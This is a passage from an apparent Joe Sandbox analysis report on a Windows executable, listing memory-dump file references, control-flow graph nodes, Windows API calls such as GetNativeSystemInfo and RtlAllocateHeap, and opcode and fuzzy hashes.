                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                            • Opcode ID: 7c318a775bde82312f88334528c3b195e40bcabaac4e0330b50f88f02de9cb3c
                                                                                                                                                                                            • Instruction ID: b30969a35f5740f041029ec213eb72b6f46508eab2854c4d096924a92272dd61
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c318a775bde82312f88334528c3b195e40bcabaac4e0330b50f88f02de9cb3c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 452179317402049BFF0CAB6CDC85B2CBB62FBD2325F284219E414D77D1DB76A6808293

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 561 897d30-897db2 call 8c40f0 565 897db8-897de0 call 8a7a00 call 895c10 561->565 566 898356-898373 call 8acff1 561->566 573 897de2 565->573 574 897de4-897e06 call 8a7a00 call 895c10 565->574 573->574 579 897e08 574->579 580 897e0a-897e23 574->580 579->580 583 897e25-897e34 580->583 584 897e54-897e7f 580->584 587 897e4a-897e51 call 8ad663 583->587 588 897e36-897e44 583->588 585 897e81-897e90 584->585 586 897eb0-897ed1 584->586 589 897e92-897ea0 585->589 590 897ea6-897ead call 8ad663 585->590 591 897ed3-897ed5 GetNativeSystemInfo 586->591 592 897ed7-897edc 586->592 587->584 588->587 593 898374 call 8c6c6a 588->593 589->590 589->593 590->586 596 897edd-897ee6 591->596 592->596 603 898379-89837f call 8c6c6a 593->603 601 897ee8-897eef 596->601 602 897f04-897f07 596->602 605 898351 601->605 606 897ef5-897eff 601->606 607 897f0d-897f16 602->607 608 8982f7-8982fa 602->608 605->566 611 89834c 606->611 612 897f29-897f2c 607->612 613 897f18-897f24 607->613 608->605 609 8982fc-898305 608->609 614 89832c-89832f 609->614 615 898307-89830b 609->615 611->605 616 897f32-897f39 612->616 617 8982d4-8982d6 612->617 613->611 622 89833d-898349 614->622 623 898331-89833b 614->623 618 89830d-898312 615->618 619 898320-89832a 615->619 620 898019-8982bd call 8a7a00 call 895c10 call 8a7a00 call 895c10 call 895d50 call 8a7a00 call 895c10 call 895730 call 8a7a00 call 895c10 call 8a7a00 call 895c10 call 895d50 call 8a7a00 call 895c10 call 895730 call 8a7a00 call 895c10 call 8a7a00 call 895c10 call 895d50 call 8a7a00 call 895c10 call 895730 call 8a7a00 call 895c10 call 8a7a00 call 895c10 call 895d50 call 8a7a00 call 895c10 call 895730 616->620 621 897f3f-897f9b call 8a7a00 call 895c10 call 8a7a00 call 895c10 call 895d50 616->621 624 8982d8-8982e2 617->624 625 8982e4-8982e7 617->625 618->619 626 898314-89831e 618->626 619->605 661 8982c3-8982cc 620->661 647 897fa0-897fa7 621->647 622->611 623->605 624->611 625->605 629 8982e9-8982f5 625->629 626->605 629->611 649 897fa9 647->649 650 897fab-897fcb call 8c8bbe 647->650 649->650 655 897fcd-897fdc 650->655 656 898002-898004 650->656 658 897fde-897fec 655->658 659 897ff2-897fff call 8ad663 655->659 660 89800a-898014 656->660 656->661 658->603 658->659 659->656 660->661 661->608 665 8982ce 661->665 665->617
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00897ED3
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                                                                            • Opcode ID: ef5bd9c7d822899452e91079857753640f902d47390ae6447352eeb7bfae5be3
                                                                                                                                                                                            • Instruction ID: 831dad2333a13a75f6ac9e483f4ca3b285ae55efd50814ad1c65a3bda1dcecfc
                                                                                                                                                                                            • Opcode Fuzzy Hash: ef5bd9c7d822899452e91079857753640f902d47390ae6447352eeb7bfae5be3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE1D370F00654ABDF15BB788C067AD7A61FB42724F984298E415E73C2DB758E8187C3

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 860 8cd82f-8cd83a 861 8cd83c-8cd846 860->861 862 8cd848-8cd84e 860->862 861->862 863 8cd87c-8cd887 call 8c75f6 861->863 864 8cd867-8cd878 RtlAllocateHeap 862->864 865 8cd850-8cd851 862->865 869 8cd889-8cd88b 863->869 866 8cd87a 864->866 867 8cd853-8cd85a call 8c9dc0 864->867 865->864 866->869 867->863 873 8cd85c-8cd865 call 8c8e36 867->873 873->863 873->864
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,008CA813,00000001,00000364,00000006,000000FF,?,008CEE3F,?,00000004,00000000,?,?), ref: 008CD871
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                            • Opcode ID: ab88d77905e1ba1bb1f5da3ab5ec1cc5b77e20fcd226eb2a9def638a863a4852
                                                                                                                                                                                            • Instruction ID: 73cc3fdbe284d08dcb12ee8ff53dd36341951e48250a4c0e65087f605c32dee8
                                                                                                                                                                                            • Opcode Fuzzy Hash: ab88d77905e1ba1bb1f5da3ab5ec1cc5b77e20fcd226eb2a9def638a863a4852
                                                                                                                                                                                            • Instruction Fuzzy Hash: B2F0B431601328A6EB213A769C01F5B7778FB85370B168939FD08EB181DA30DC0085E1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,0089DA1D,?,?,?,?), ref: 008987B9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
